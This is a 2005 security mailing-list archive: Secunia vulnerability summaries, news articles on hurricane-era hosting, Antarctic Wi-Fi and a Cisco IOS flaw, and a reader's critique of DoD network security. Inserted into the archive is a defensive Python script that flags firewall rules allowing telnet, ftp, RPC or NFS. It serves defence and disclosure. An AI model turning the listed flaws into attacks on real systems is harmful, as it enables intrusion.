Full Advisory: http://secunia.com/advisories/16578/ -- [SA16642] Avaya OpenSSL "der_chop" Script Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-31 Avaya has acknowledged a vulnerability in openssl included in some products, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16642/ -- [SA16626] Gentoo update for lm_sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-31 Gentoo has issued an update for lm_sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16626/ -- [SA16610] Debian update for maildrop Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-30 Debian has issued an update for maildrop. This fixes a security issue, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16610/ -- [SA16608] Fedora update for kernel Critical: Less critical Where: Local system Impact: Security Bypass Released: 2005-08-29 Fedora has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16608/ -- [SA16591] Debian update for backup-manager Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation Released: 2005-08-29 Debian has issued an update for backup-manager. This fixes two vulnerabilities, which potentially can be exploited by malicious, local users to disclose potentially sensitive information or perform certain actions on a vulnerable system with escalated privileges. 
Full Advisory: http://secunia.com/advisories/16591/ -- [SA16586] HP-UX Veritas File System Security Bypass Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2005-08-26 A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16586/ -- [SA16579] Mandriva update for lm_sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-26 Mandriva has issued an update for lm_sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16579/ -- [SA16606] Fedora update for ntp Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-08-29 Fedora has issued an update for ntp. This fixes a security issue, which can cause ntpd to run with incorrect group permissions. Full Advisory: http://secunia.com/advisories/16606/ -- [SA16602] NTP Incorrect Group Permissions Security Issue Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-08-29 Josh Bressers has reported a security issue in ntpd, which can cause ntpd to run with incorrect group permissions. Full Advisory: http://secunia.com/advisories/16602/ Other:-- [SA16640] Novell NetWare CIFS Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-08-31 A vulnerability has been reported in NetWare, which can be exploited by malicious people to cause a DoS (Denial of Service). 
Full Advisory: http://secunia.com/advisories/16640/ Cross Platform:-- [SA16627] FUDforum Avatar Upload Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 riklaunim has discovered a vulnerability in FUDforum, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16627/ -- [SA16620] AutoLinks Pro "alpath" File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 NewAngels Team and 4Degrees have reported a vulnerability in AutoLinks Pro, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16620/ -- [SA16617] phpLDAPadmin welcome.php Arbitrary File Inclusion Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 rgod has discovered a vulnerability in phpLDAPadmin, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16617/ -- [SA16607] Looking Glass Cross-Site Scripting and Shell Command Injection Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2005-08-29 rgod has discovered some vulnerabilities in Looking Glass, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16607/ -- [SA16585] Quake 2 Lithium II Mod Nickname Format String Vulnerability Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-08-29 SinNULL has reported a vulnerability in Lithium II Mod, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/16585/ -- [SA16632] PHP-Fusion Nested BBcode "url" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-30 slacker4ever_1 has discovered a vulnerability in PHP-Fusion, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16632/ -- [SA16625] Cosmoshop Login SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Manipulation of data, Exposure of sensitive information Released: 2005-08-30 l0om has reported a vulnerability in Cosmoshop, which can be exploited by malicious people to conduct SQL injection attacks and disclose sensitive information. Full Advisory: http://secunia.com/advisories/16625/ -- [SA16623] Helpdesk software Hesk Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-08-30 s2b has discovered a vulnerability in Helpdesk software Hesk, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16623/ -- [SA16616] Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-08-30 Kenneth F. Belva has discovered a vulnerability in Simple PHP Blog, which can be exploited by malicious people to manipulate sensitive information. Full Advisory: http://secunia.com/advisories/16616/ -- [SA16612] FreeStyle Wiki Arbitrary Command Injection Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-30 A vulnerability has been reported in FreeStyle Wiki, which can be exploited by malicious users to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/16612/ -- [SA16597] PhotoPost PHP Pro EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has reported a vulnerability in PhotoPost PHP Pro, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16597/ -- [SA16596] YaPig EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has discovered a vulnerability in YaPig, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16596/ -- [SA16595] phpGraphy EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has reported a vulnerability in phpGraphy, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16595/ -- [SA16594] Gallery EXIF Data Script Insertion and File Disclosure Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information Released: 2005-08-26 Two vulnerabilities have been reported in Gallery, which can be exploited by malicious people to conduct script insertion attacks or disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16594/ -- [SA16611] phpLDAPadmin Anonymous Bind Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-30 Alexander Gerasiov has reported a security issue in phpLDAPadmin, which can be exploited by malicious people to bypass certain security restrictions. 
Full Advisory: http://secunia.com/advisories/16611/ -- [SA16605] phpMyAdmin Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-29 Some vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16605/ -- [SA16598] Simple PHP Blog Image File Upload Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2005-08-26 ReZEN and 0xception have discovered a vulnerability in Simple PHP Blog, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16598/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Fri Sep 2 06:50:27 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:58:07 2005 Subject: [ISN] Flood Waters Can't Sink Net Link Message-ID: http://www.wired.com/news/planet/0,2782,68725,00.html By Joel Johnson Sept. 01, 2005 Despite the loss of most public utilities, at least one hosting company in hurricane-battered New Orleans is still online, fighting against time and the odds to keep part of the internet humming. 
Occupying the 10th floor of a downtown Big Easy office building, Zipa [1] is a typical web-hosting and co-location center, with one key difference: It's sitting smack dab in the middle of some of the worst devastation the United States has ever experienced. With buildings reduced to soggy ruin just a few blocks away, Zipa's data center -- built by Enron in its expansionist heyday -- still operates, powered by a 750-kilowatt diesel generator and connected to the rest of the world by a fiber optic connection buried deep underneath New Orleans' flooded streets. That makes the employees of Zipa and sister company DirectNIC [2], which is just upstairs, some of the only flood victims in New Orleans with the ability to communicate with the outside world. It's an advantage they are quick to put to use. DirectNIC's "crisis manager," Michael "Interdictor" Barnett, updates his Live Journal [3] continually with on-the-street reports. It may be the only blog currently both written and hosted inside New Orleans, and it's receiving nearly 3,000 visitors an hour. A webcam streams images from inside the data center, showing haggard but smiling employees. Voice-over-IP telephones let stranded workers make telephone calls even when the rest of the city's phone service is severely overloaded. A photo gallery [4] is filled with pictures uploaded by the dozen. "We are still up and running," says Zipa's data center manager Michael Brunson. "We have people on site and they are doing well. Even if they need a bath." The atmosphere is a strange mixture of corporate casual and martial discipline. Men in shorts and polo shirts form squads to patrol and secure the 27-story high-rise -- with no working elevators. Police and National Guard members, separated from their cohorts, are using the Zipa building as a staging point and shelter. For Barnett, an Army Special Forces veteran, it's about more than just protecting the companies' assets. "I love this city, even with all its faults.... 
We're going to do what we can to set it right," he said.

Supplies are scarce. A trip onto the streets of New Orleans to rescue a customer's server was also a chance to scavenge 25 gallons of potable water and some cleaning supplies (with the blessing of the owner, who had just hired the company to go rescue his computer). Employees stay primarily in the server room itself, enjoying the pleasures of the air conditioning necessary to keep the servers cool.

Those servers host hundreds of thousands of websites and online forums, including dyspeptic internet community Something Awful [5]. Something Awful's founder, Rich Kyanka, is taking the potential loss of service in stride. "Our last-ditch plan is to change the forums into a podcast, then send RSS feeds into the blogosphere so our users can further debate the legality of mashups amongst this month's 20 'sexiest' gadgets." Kyanka hasn't yet been contacted by Zipa with contingency plans. "As long as the servers stay up, they can stay out of contact for as long as they like," he said.

But no amount of tenacity will keep Zipa's diesel generator fueled. While currently operating at less than 20 percent of its full capacity, the generator can't run forever. "We should be able to stay up a few more days with what we have in-house," said Brunson. A fuel drop on Wednesday had to be abandoned because they weren't ready with fuel drums, according to Barnett's blog.

-=-
[1] http://zipa.com/
[2] http://www.directnic.com/
[3] http://mgno.com/
[4] http://sigmund.biz/kat/index.html
[5] http://somethingawful.com/

From isn at c4i.org Thu Sep 8 02:36:26 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:42:42 2005 Subject: [ISN] DOD's 'Manhattan Project' Message-ID: Forwarded from: matthew patton

> Unless DOD changes how it operates and learns to defend its cyber
> networks, many military experts say it will not be able to wage an
> effective battle in the cyberwar that is emerging as the 21st
> century's biggest challenge.
I don't go much for this bit about cyberwar this and that. Bombs, guns and boots on the ground are what ultimately matters. But if an adversary can jam and interfere with communications, then yes it affects the delivery of the above. I do think DoD has to take a look at their comm systems and their comm demands and figure out if the equipment they have or intend to rely upon will be available when push comes to shove. Frequency hopping and line encryption is no longer the exclusive domain of tier-1 militaries. But I'm sure people far smarter than me have looked into that by now.

> The Pentagon is at a crossroads, said Air Force Lt. Gen. Charles
> Croom, the new director of the Defense Information Systems Agency
> and commander of the Joint Task Force for Global Network Operations
> (JTF-GNO). "Networks are too important to the warfighter to not have
> them when the warfight begins," he said.

So does this mean DoD/OSD firewalls are going to change to deny everything and then explicitly allow, and be VERY careful and deliberate about what they allow?

The Pentagon's primary problem is pandering - pandering to senior officers and officials. How many E3s, let alone junior officers and contractors who are theoretically following or at least trying to follow STIGs, are going to refuse to back down when the O6 or UnderSecretary is bellowing that "by god I will have my fill_in_the_blank"? Something as mindless as forcing the screen to lock out after 10/15 min of inactivity can nearly cause a revolt. Where are the senior managers who instead of signing some lame waiver throw the people out of their office and tell them in no uncertain terms to figure out how to do something in a secure fashion? If the proper and secure solution is not convenient, then it's just too damn bad. Do it the right way or don't do it at all. No more of this tolerating substandard contractors and staff alike who refuse to spend any effort on doing things the secure way.
It's not good enough to have a 'firewall' and then continue to be just as sloppy on the inside. The military is used to operating in top-down mode. So how come there isn't an IAP-wide ban on telnet, cleartext ftp, RPC, NFS etc? Everything that is not designed or implemented correctly gets turned off. Period. No exceptions. Sure there will be a lot of silly screaming and temper tantrums, but the SecDEF on down need to get the message that sloppiness impacts the mission and costs lives. If a content creator can't upload to the web staging server because the "no clear ftp" rule is in effect, it's not time to browbeat or sidestep the policy, but rather time to get jumping ugly with the sysadmins who host the web content server to get their act together already. If the 'brass' won't even play by the rules and lay a heavy hand on their staff who don't want to either, then the General is wasting his breath.

(Un)fortunately this is not just a problem in the military. Plenty of Fortune 100s on down who have legal, regulatory, and business critical justifications to clean up their act are no more interested in fixing their messes either.

> Croom said DOD approaches computer network defense by emphasizing
> convenience to users, but the department's future information
> assurance strategy should tilt toward adding security.

I'd frankly settle for competence on the part of system admins instead of what we have now, which is laziness, lack of basic skills and knowledge, and an attitude of security doesn't matter. Security is hard and inconvenient. And since it is, they don't want to do it. Those organizations that have staffers who care routinely cut themselves off from the rest of the Pentagon and take matters into their own hands. Part of the justification is defense-in-depth. But a big reason is that Pentagon/DoD network security simply can't be relied upon.
I don't care if the other 30,000 computers in the building are owned by the military, they have no business being able to see or connect to my machines and neither do my machines have any business messing with anybody else. It is up to me to protect my users, and to protect the rest of the world *from* my users. That is my job. Few of my peers see it that way though.

> "The threat is great," Croom said. "It requires constant vigilance."

Well, how "great" does it have to get before the boot comes stamping down hard on 20 years of institutionalized carelessness? Organizations hate to change. Do we have to blow up the building a second time? Who's going to put the screws to the service CIOs and bring them to account? Who will in turn roll that snowball down the hill? DoD had a decent rating/tracking system for patch management and if an organization failed to keep abreast, it was plain to see. Granted it worked on the honor system and public humiliation, but why not put some real teeth in it and tie salaries to network security metrics? If say the OSD CIO was forced to take a 50% pay cut, and the rest of the managers on down the line, I think we'd find some boots firmly planted in some butts. All of a sudden, all those excuses why security couldn't be done or why NT4 can't be turned off would evaporate like the morning mist.

DITSCAP and other accreditation initiatives were a good idea. But what is useful about documenting the often glaring security deficiencies (assuming they were even recognized and identified as such) and getting somebody who won't be held accountable to sign off on them? Why aren't organizations forced to go back and FIX the problems?

> DOD turned to procurement to support these policies and develop new
> kinds of defenses for cyberattacks. First, the department chose
> Retina from eEye Digital Security to scan computers for
> vulnerabilities. Then, DOD selected Hercules from Citadel to patch
> computers.
> Next, the department built a new multimillion-dollar
> command center to monitor global network operations and picked
> PestPatrol, antispyware from Computer Associates International. DOD
> will soon begin testing Pest Patrol before introducing it later in
> the year.

This technology is all fine and good. But Security is not a technology problem. It's a people problem. No amount of Hercules/PestPatrol/NortonAV is going to fix fundamental network engineering mistakes. The services don't necessarily have a massive patch management problem (though there are some that need motivating), they have a network architecture and mindset problem.

I've got a Nokia IPSO sitting on a rack. It's been there for 3 years. OSD tossed it at us and I guess figured we'd do something with it. Well, it's been acting as a doorstop and dust collector all this time. Nobody here knew what to do with it or had the necessary motivation (personal or organizational) to figure it out and engineer the network to make use of it. Within hours of arriving and being informed of my mission I asked where our firewall was and discovered our all too typical state.

> "This is the equivalent of the Manhattan Project," Lentz said. "I
> will say we are at that level of seriousness of securing this
> massive network."
>
> Every four hours, he said, the equivalent of the entire Library of
> Congress' archives travels on DOD networks. To wage network-centric
> warfare, he said, the department's 4 million users must trust the
> confidentiality of the information that crosses GIG and be assured
> of its availability.

The amount of packets or the number of interconnects is not important. Security done right all the way to the lowest levels makes a large, complex problem quite manageable. And that is where most organizations (incl the gov't) fall flat on their face. When the department doesn't bother to practice good security, then it makes the division's job considerably more difficult.
It's up to the division to cut the department off until they get their act straight. And on up the food chain. But if there are no marching orders and feet held to real fires, then nobody has incentive to put the screws hard to the people under their command. In the Army, god help the Lt. who has a member of his squad lose a case of ammo on an exercise. Is doing computer security that unimportant?

> "The risk of losing the engagement because the systems were hacked
> grows explosively," Paller said. President Bush has pledged to
> defend Taiwan if China attacks. And DOD has said the new local
> warfighting strategy of China's People's Liberation Army is to use
> computer network operations to seize the initiative and gain
> electromagnetic dominance early.

I can appreciate the vital significance of communications and data feeds in dealing with the fog of war. But we have mobile comm groups for a reason. Yes, it would be inconvenient not to be able to use the Taiwan phone system to interconnect battalions in the field with tactical HQ. But something tells me the Chinese will 'win' in Taiwan and it has nothing to do with their h4x0r skills or Taiwan's lackadaisical attitude toward infrastructure security. Then again is it Taiwan's fault or more the telco provider itself who could care less about the security of the product (hardware and especially software) it sells? Homeland Security has been beating their drum for a while now. Look what Cisco pulled at BlackHat. If we're all in this together, how come commercial entities continue to downplay their "social obligations"? This latest worm knocked out what, several banks, an auto plant and probably lots of other lesser targets. I'll bet some pointed questions have been asked by now. But did anybody learn a lesson? Or are we just doomed to repeat the same idiocy the next time around?
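The two concrete demands in the reply above, "deny everything and then explicitly allow" and a flat ban on telnet, cleartext ftp, RPC and NFS, are the kind of policy that can be checked mechanically rather than argued about per waiver. The following is an added example, not part of the forwarded post and not a DoD or vendor tool: a small Python audit that reads an iptables-save style ruleset, flags any inbound chain whose default policy is not DROP, and flags any ACCEPT rule that opens one of the banned services, including when the port is hidden inside a range or a multiport list. Both rulesets it runs against are constructed for the example; the port numbers are the standard IANA assignments.

```python
"""Audit an iptables-save ruleset for deny-by-default and banned cleartext/legacy services. Added example."""
import re
from collections import namedtuple

# Services the reply above wants banned outright, keyed by (protocol, port).
# Port numbers are the standard IANA assignments.
BANNED_SERVICES = {
    ("tcp", 23): "telnet",
    ("tcp", 21): "ftp control channel (cleartext)",
    ("tcp", 111): "sunrpc/portmapper",
    ("udp", 111): "sunrpc/portmapper",
    ("tcp", 2049): "nfs",
    ("udp", 2049): "nfs",
}

# Chains that see traffic arriving from the network; each must default to DROP.
INBOUND_CHAINS = ("INPUT", "FORWARD")

POLICY_RE = re.compile(r"^:(\S+)\s+(ACCEPT|DROP|REJECT)\b")  # ":INPUT ACCEPT [0:0]"
RULE_RE = re.compile(r"^-A\s+(\S+)\s+(.*)$")                 # "-A INPUT <match> -j <target>"
PROTO_RE = re.compile(r"(?:^|\s)-p\s+(\S+)")
DPORT_RE = re.compile(r"--dports?\s+(\S+)")   # --dport N, --dport N:M, --dports a,b,c
TARGET_RE = re.compile(r"-j\s+(\S+)")

# kind is "policy" (default is not DROP) or "service" (a banned port is allowed).
Finding = namedtuple("Finding", "kind chain detail")


def parse_ruleset(text):
    """Return ({chain: default_policy}, [(chain, rule_body), ...])."""
    policies, rules = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#*" or line == "COMMIT":
            continue  # comments, table headers ("*filter") and COMMIT carry no rules
        m = POLICY_RE.match(line)
        if m:
            policies[m.group(1)] = m.group(2)
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), m.group(2)))
    return policies, rules


def port_ranges(spec):
    """Expand '22', '111:2049' or '21,80,443' into a list of (lo, hi) pairs."""
    out = []
    for tok in spec.split(","):
        lo, _, hi = tok.partition(":")
        out.append((int(lo), int(hi) if hi else int(lo)))
    return out


def audit(text):
    """Return all Findings for one ruleset; an empty list means it passes."""
    policies, rules = parse_ruleset(text)
    findings = []
    for chain in INBOUND_CHAINS:
        policy = policies.get(chain)
        if policy != "DROP":
            findings.append(Finding("policy", chain,
                f"default policy is {policy or 'missing'}; deny-by-default requires DROP"))
    for chain, body in rules:
        target, proto, dport = (r.search(body) for r in (TARGET_RE, PROTO_RE, DPORT_RE))
        if not (target and target.group(1) == "ACCEPT" and proto and dport):
            continue  # only explicit allows of a specific protocol/port matter here
        ranges = port_ranges(dport.group(1))
        for (p, port), name in BANNED_SERVICES.items():
            if p == proto.group(1) and any(lo <= port <= hi for lo, hi in ranges):
                findings.append(Finding("service", chain,
                    f"allows {name} on {p}/{port}: -A {chain} {body}"))
    return findings


# Constructed sample (not from a real host): allow-by-default with a few things blocked.
SAMPLE_SLOPPY = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
-A INPUT -p tcp --dport 23 -j ACCEPT
-A INPUT -p tcp -m multiport --dports 21,80,443 -j ACCEPT
-A INPUT -p udp --dport 111:2049 -j ACCEPT
COMMIT
"""

# Constructed sample: deny-by-default with one explicit allow; passes the audit.
SAMPLE_STRICT = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SLOPPY):
        print(f"[{f.kind}] {f.chain}: {f.detail}")
```

Run against the output of `iptables-save` on a real host, the sloppy sample produces one policy finding (INPUT defaults to ACCEPT) and four service findings: telnet on tcp/23, ftp on tcp/21 hidden in the multiport list, and sunrpc and nfs on udp swept in by the 111:2049 range. The strict sample produces none. The check only understands the filter table's `-p`/`--dport` form; rules that match by interface or address alone are deliberately ignored, since the point is to catch explicit allows of the named services.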
From isn at c4i.org Thu Sep 8 02:36:48 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:42:58 2005 Subject: [ISN] Running Wi-Fi in the coldest, driest and windiest place on Earth Message-ID: http://www.tomshardware.com/hardnews/20050901_172053.html

By Humphrey Cheung
September 1, 2005

Westlake Village (CA) - If you think setting up a wireless network is difficult in your living room, try the Antarctic. For the last seven years scientists in Antarctica have been setting up access points and repeaters in sub-zero temperatures and 80 mile per hour winds. To the hundreds of scientists stationed there, wireless gives a big morale boost and increases their efficiency. Kent Colby, Senior Communications Tech with the National Science Foundation, told us what it is like to be the "Wi-Fi guy" down south.

Wireless access points and repeaters, often placed on mountain tops, shuttle information between science camps, towns and ports. A wireless network provides scientists a valuable and often the only available infrastructure for transmitting the enormous amount of digital data from collection points to home base.

While Wi-Fi has increased bandwidth between residents and stations in Antarctica, traffic heading off the world's second smallest continent is very limited. With only 10 phone lines and a single T1 coming off the continent, strict procedures are in place to ration outside access. There is a coffee shop where scientists can grab a hot drink and plug in their laptops, but around town options are scarce. "The T1 is shared with NASA so really we have only 180K for Internet. You can't use wireless around town because it chokes the bandwidth," says Colby.

Personnel must brave the elements to get to Wi-Fi installation sites, often on mountain tops. Temperatures usually hover around -5 to -31 degrees Fahrenheit in the summer, but have dipped to an incredible -129 degrees Fahrenheit, according to Colby.
In addition, 100 mile per hour winds are sustained for several hours, and Colby remembers when they had 80 mile per hour winds for two and a half days straight. "The wind can blow doors off and collapse a building," says Colby.

Storms can trap Wi-Fi installers on a mountain top. Extreme winds of up to 200 mile per hour along with white-out conditions can make any type of rescue impossible. Colby says that most sites have pre-positioned supplies and that personnel can survive several days before getting help.

The wireless access points and repeaters are also subjected to extreme conditions. "If a manufacturer says their access point is rated for up to -20 degrees, we say that we need it to be -40," says Colby. Once the access point is turned on it stays on for the whole summer, thanks to solar panels and backup batteries. Perhaps the cold temperature also improves stability because, according to Colby, they have had only three weather related equipment failures over the years.

So why would anyone need Wi-Fi in the Antarctic wasteland? For residents it has proved to be a huge morale boost. Scientists can keep in touch with loved ones back home. Colby says that one school teacher was able to send almost daily pictures back to her class.

In addition to the morale boost, the wireless network has other tangible and perhaps lifesaving benefits. Scientific data can now be relayed with a simple email from a laptop. Before Wi-Fi, radio channels would be tied up as information was read. "You don't have to read the data and keep saying roger," says Colby.

The wireless network has brought some extra headaches to network administrators. Scientists have brought subnets down with their personally installed access points. Improperly configured IP addresses have caused packet storms, making Colby's life difficult. How does the IT team prevent such disasters? "We go wardriving," says Colby.
Running AirMagnet on his laptop, Colby trudges around town looking for rogue access points. Colby says, "I find a lot of Linksys and Netgear here and there." He also has found scientific data on shared folders. While some networks are secured, most are not, and Colby isn't overly concerned about intruders finding sensitive information. "If someone did hack in, they would find out that a certain moss grows at 1 mm a year, how thrilling is that?"

From isn at c4i.org Thu Sep 8 02:35:22 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:43:17 2005
Subject: [ISN] The Four Most Common Security Dangers
Message-ID:

http://informationweek.com/story/showArticle.jhtml?articleID=170700829

By Matthew Friedman
Networking Pipeline
Sept. 6, 2005

For all the complexity of security, the most common security dangers are downright mundane. They're not due to the arcane arts of the most skilled hackers or some cunning exploit; they're out there in plain sight.

"A successful attack depends on a combination of four things that don't have a lot to do with the attacker," says Forrester Research analyst Paul Stamp. "It's usually something like social engineering, a breakdown in process or the absence of process. It could have something to do with a simple technical vulnerability or insider abuse. But it's usually a combination of two or more of those four factors."

The thing that should send chills up the spine of anyone who manages a network open to the Internet -- which is to say, virtually all networks -- is the fact that all of these vulnerabilities can be easily caught and fixed. Because they're so common, obvious, or at least mundane, however, they are often the last place you'll look for danger.

Social Engineering: It's humbling to remember that superstar hacker Kevin Mitnick wasn't much of a code warrior. However, he was a first-rate social engineer who raised the "Hi, how are you, what's your password?" approach to network delinquency to the level of a black art.
With the constant warnings about protecting passwords and not opening unsolicited attachments, you'd think that network users would be wise to what is, after all, the oldest trick in the hacker's book. But they aren't. Stamp says, "You'd be surprised how often social engineering succeeds."

Just this summer, the British Department of Defence -- which should be on the list of people who should be wise to this -- was subjected to a targeted Trojan attack. "People were sent CDs with marketing material," Stamp says. "In fact, it installed a targeted Trojan that collected confidential information."

The bottom line is that even smart people can be sucked in by social engineering. The first step toward protection, Stamp says, is as basic as education. "It truly is a boring recommendation, but we have to educate users and back that up with action," he says. "The time has passed for us to tolerate fools. We have to be serious about this and take disciplinary action against people who don't do what they're supposed to do. The stakes are too high."

Process Errors: It seems that there is always a technological fix for every security problem, but that, in itself, is part of the problem, Stamp says. "We do a very good job of going out and looking at technical vulnerabilities," he says. "But people don't do a very good job of taking apart processes and seeing where those are vulnerable." It could be that the process has no oversight mechanism, or that someone has forgotten to check something that should have been checked out, but the results are the same: a lot can go wrong if you're not looking.

Stamp points to the Choicepoint case earlier this year as a prime example of a breakdown in process. "Criminals were able to open fraudulent accounts with Choicepoint because the process for opening an account didn't involve checking to see if the client was a real company," he says. "It was as simple as that."
Moreover, if companies are going to use technologies like networks, wireless and mobile devices, they have to have some way of dealing with everything from absent-mindedness to incompetence and malice. Mistakes happen, of course, but they can turn into disasters if you don't respond to them effectively. "It could be something as simple as someone leaving a Blackberry in a cab," Stamp says. "Surprisingly few companies have policies for dealing with Blackberries when they're out of the office, and the whole point of a Blackberry is to be out of the office."

Technical vulnerabilities: Enterprise networks, with their passels of routers, switches, access points and other kinds of hardware, are fundamentally complex organisms. And that's a problem. It's easy to keep a door locked when you only have one door, but add a few more, some windows and a skylight, and the security problem increases exponentially. With so many devices and connections to watch on a network, there are also so many opportunities to miss something. "Normally, at some point along the way, there's something that hasn't been patched, or something that hasn't been configured properly, and that leaves the whole network vulnerable," Stamp says. "Complexity is a big part of it. Complexity is the enemy of security, but the CIO's and CSO's job is complexity management."

Inside Abuse: No one suspects family, but maybe they should. The Computer Security Institute-FBI computer crime survey has found every year for the last five years that at least half of all security breaches originate on the inside of the network. "Inside abuse is network security's dirty little secret," Stamp says. "We've been too trusting so far. It comes back to the reality that some people are being malevolent, and sometimes it is accidental. But you need policies to stop the malevolent ones and minimize the accidents."
Part of the problem is that no one wants to believe that one of their own could be the problem, and inside abuse is often swept under the carpet. But Stamp is adamant that just because you can't or choose not to see the problem doesn't mean it isn't there.

At the end of the day, all of these common dangers can be dealt with; it only takes the will to clean up processes, patch systems, and make sure that users are doing what they're supposed to be doing. "It has to be both a change in attitude and the adoption of newer, smarter technologies," Stamp says. "That means designing the network to be secure from the ground up, and that includes the people as well as the technology."

From isn at c4i.org Thu Sep 8 02:35:35 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:43:40 2005
Subject: [ISN] New Cisco flaw could pose threat to Net
Message-ID:

http://news.com.com/New+Cisco+flaw+could+pose+threat+to+Net/2100-1002_3-5853330.html

By Joris Evers
Staff Writer, CNET News.com
September 7, 2005

A serious flaw in Cisco Systems software puts computer networks at risk of cyberattack and has prompted security vendor Symantec to raise its Internet threat level.

A vulnerability in Cisco's Internetwork Operating System could be exploited to crash or remotely run malicious code on devices that run IOS, the San Jose, Calif., networking giant warned Wednesday in a security advisory. IOS runs on Cisco's routers and switches, which make up a large portion of the Internet's infrastructure.

"Successful exploitation of the vulnerability on Cisco IOS may result in a reload of the device or execution of arbitrary code," Cisco said in its advisory. "Repeated exploitation could result in a sustained (denial of service) attack or execution of arbitrary code."

Cisco's warning prompted Symantec to raise its ThreatCon global threat index to Level 2, which means an attack is expected.
